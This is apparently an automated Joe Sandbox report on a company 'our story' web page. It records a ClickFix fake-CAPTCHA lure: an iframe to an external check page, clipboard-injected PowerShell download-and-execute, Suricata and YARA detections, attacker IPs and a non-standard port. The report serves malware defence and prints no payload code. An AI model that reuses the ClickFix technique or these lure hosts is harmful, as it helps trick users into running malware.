Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.elevate.inc/our-story

Overview

General Information

Sample URL:https://www.elevate.inc/our-story
Analysis ID:1708558
Infos:

Detection

CAPTCHA Scam ClickFix
Score:84
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
HTML page adds supicious text to clipboard
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
HTML title does not match URL
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,3997205691396304425,4085780284626710744,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.elevate.inc/our-story" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • powershell.exe (PID: 5464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msedge.exe (PID: 4432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2028,i,9472937289129362834,8474576110919847166,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8396 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2028,i,9472937289129362834,8474576110919847166,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8408 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5016 --field-trial-handle=2028,i,9472937289129362834,8474576110919847166,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

AI Reasoning

No reasoning have been found

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_806JoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    dropped/chromecache_806JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      HTML

      SourceRuleDescriptionAuthorStrings
      0.5.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
        0.12.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_5464.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xc663:$b1: ::WriteAllBytes(
          • 0xec64:$b1: ::WriteAllBytes(
          • 0xc123:$b2: ::FromBase64String(
          • 0xc180:$b2: ::FromBase64String(
          • 0xc1c5:$b2: ::FromBase64String(
          • 0xc206:$b2: ::FromBase64String(
          • 0xc49e:$b2: ::FromBase64String(
          • 0xc4d9:$b2: ::FromBase64String(
          • 0xc802:$b2: ::FromBase64String(
          • 0xe724:$b2: ::FromBase64String(
          • 0xe781:$b2: ::FromBase64String(
          • 0xe7c6:$b2: ::FromBase64String(
          • 0xe807:$b2: ::FromBase64String(
          • 0xea9f:$b2: ::FromBase64String(
          • 0xeada:$b2: ::FromBase64String(
          • 0xee03:$b2: ::FromBase64String(
          • 0xbda3:$s1: -join
          • 0x554f:$s4: +=
          • 0x5611:$s4: +=
          • 0x9838:$s4: +=
          • 0xb955:$s4: +=

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4280, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 5464, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-06-06T22:24:22.636706+020020584731A Network Trojan was detected167.172.78.216443192.168.2.1749747TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-06-06T22:25:37.816835+020028032742Potentially Bad Traffic192.168.2.174989374.208.195.1885927TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-06-06T22:24:42.655717+020018100002Potentially Bad Traffic192.168.2.174980974.208.195.1885927TCP
          2025-06-06T22:25:37.816835+020018100002Potentially Bad Traffic192.168.2.174989374.208.195.1885927TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Yara detected CAPTCHA Scam ClickFix
          Source: Yara matchFile source: 0.5.pages.csv, type: HTML
          Source: Yara matchFile source: 0.12.pages.csv, type: HTML
          Source: Yara matchFile source: dropped/chromecache_806, type: DROPPED
          Source: https://www.elevate.inc/our-storyHTTP Parser: Base64 decoded: {"alg":"HS256","typ":"JWT"}
          Source: https://www.elevate.inc/our-storyHTTP Parser: Title: Trailblazing a better future for benefits | Our Story does not match URL
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: //cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435%3Fapp_id%3D122963&dntp=1&display_name=Vimeo&url=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435&image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d_1280&key=c4e54deccf4d4ec997a64902e9a30300&type=text%2Fhtml&schema=vimeo
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241460901&cv=11&fst=1749241460901&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241461344&cv=11&fst=1749241461344&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: //cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435%3Fapp_id%3D122963&dntp=1&display_name=Vimeo&url=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435&image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d_1280&key=c4e54deccf4d4ec997a64902e9a30300&type=text%2Fhtml&schema=vimeo
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241460901&cv=11&fst=1749241460901&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241461344&cv=11&fst=1749241461344&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: //cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435%3Fapp_id%3D122963&dntp=1&display_name=Vimeo&url=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435&image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d_1280&key=c4e54deccf4d4ec997a64902e9a30300&type=text%2Fhtml&schema=vimeo
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://reefe.com.au/ab/elevateinc/check/index.html
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241460901&cv=11&fst=1749241460901&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg
          Source: https://www.elevate.inc/our-storyHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/11308007612?random=1749241461344&cv=11&fst=1749241461344&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
          Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
          Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
          Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
          Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
          Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
          Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
          Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
          Source: https://www.elevate.inc/our-storyHTTP Parser: No favicon
          Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="author".. found
          Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="author".. found
          Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="author".. found
          Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="copyright".. found
          Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="copyright".. found
          Source: https://www.elevate.inc/our-storyHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49789 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49791 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49792 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.50.80.209:443 -> 192.168.2.17:49793 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49794 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.17:49802 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.42.254:443 -> 192.168.2.17:49804 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.240.156.206:443 -> 192.168.2.17:49808 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.17:49810 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.3.254:443 -> 192.168.2.17:49823 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.113.155.207:443 -> 192.168.2.17:49838 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.211.137.143:443 -> 192.168.2.17:49843 version: TLS 1.2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2058473 - Severity 1 - ET MALWARE Observed ClickFix Powershell Delivery Page Inbound : 167.172.78.216:443 -> 192.168.2.17:49747
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 5927
          Source: unknownNetwork traffic detected: HTTP traffic on port 5927 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 5927
          Source: unknownNetwork traffic detected: HTTP traffic on port 5927 -> 49893
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=po&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=af41f482fd644dc08e178ad70ac98253&ig=7f023d851b1c4a10b88ee1a393219c43 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=pow&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=af41f482fd644dc08e178ad70ac98253&ig=0f0639c2c361419eb32d978828c89573 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powe&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=af41f482fd644dc08e178ad70ac98253&ig=39c4927accfc452f8eb9636a255ac733 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=power&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=5&cvid=af41f482fd644dc08e178ad70ac98253&ig=a4ad7baebaa74ff191f5c2b6cf3f1817 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=p&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=af41f482fd644dc08e178ad70ac98253&ig=fff5cb64ba6348379a8dc0b7187e93e7 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-s
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerz&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=6&cvid=af41f482fd644dc08e178ad70ac98253&ig=29b3b08290db400e8d68c7073071cd93 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
